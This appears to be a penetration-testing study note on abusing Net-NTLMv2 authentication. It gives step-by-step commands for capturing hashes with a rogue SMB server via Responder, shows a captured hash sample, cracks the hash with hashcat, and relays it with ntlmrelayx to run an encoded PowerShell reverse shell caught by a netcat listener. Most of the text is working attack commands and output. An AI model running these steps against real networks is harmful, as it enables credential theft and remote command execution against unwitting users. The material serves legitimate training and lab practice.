Abuse Net-NTLMv2 Protocol (Crack or Relay)

This attack is possible when we have a shell/rce on a host under an unprivilege user and we don't know his password/hash.

Theory

• We spawn a malicious SMB server that forces authentication via NTMLv2 instead of Kerberos

• From our shell / rce, we trigger authentication by accessing the share

• Our malicious SMB server captures the hash which we can attempt to crack or relay

Crack the hash Attack

Download responder => https://github.com/lgandx/Responder (clone repo and run Responder.py) or it's also already pre-installed on kali but must be run with sudo.

On our kali we spawn responder (make sure to use correct network interface):

sudo responder -I tun0

Then using our rce/shell, we trigger an authentication by accessing the malicious smb server:

dir \\192.168.119.2\test

Responder should have capture the hash:

[+] Listening for events... 
[SMB] NTLMv2-SSP Client   : ::ffff:192.168.50.211
[SMB] NTLMv2-SSP Username : FILES01\paul
[SMB] NTLMv2-SSP Hash     : paul::FILES01:1f9d4c51f6e74653:795F138EC69C274D0FD53BB32908A72B:010100000000000000B050CD1777D801B7585DF5719ACFBA0000000002000800360057004D00520001001E00570049004E002D00340044004E004800550058004300340054004900430004003400570049004E002D00340044004E00480055005800430034005400490043002E00360057004D0052002E004C004F00430041004C0003001400360057004D0052002E004C004F00430041004C0005001400360057004D0052002E004C004F00430041004C000700080000B050CD1777D801060004000200000008003000300000000000000000000000002000008BA7AF42BFD51D70090007951B57CB2F5546F7B599BC577CCD13187CFC5EF4790A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E003100310038002E0032000000000000000000 

Crack the hash

We can attempt to crack the hash with hashcat using the NetNTLMv2 attack mode:

hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force

Once the password is cracked we now have the credentials of the user we could only interact as via shell/rce.

Relay the hash Attack

Instead of cracking the hash, we relay it to another machine the user as access to. Once authenticated on this new machine, we can trigger a command on behalf of this user.

We start the malicious smb server:

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."

• -t is the IP of the new machine we want to authenticate to

• -c is the command that will be executed as the user

  • powershell -enc allows to execute a command that's base64 encoded.

  • We use this reverse shell as the encoded command https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

Now we can setup our netcat listener to catch the shell.

Finally using our rce/shell, we trigger an authentication by accessing the malicious smb server:

dir \\192.168.119.2\test 

We should now have caught a shell.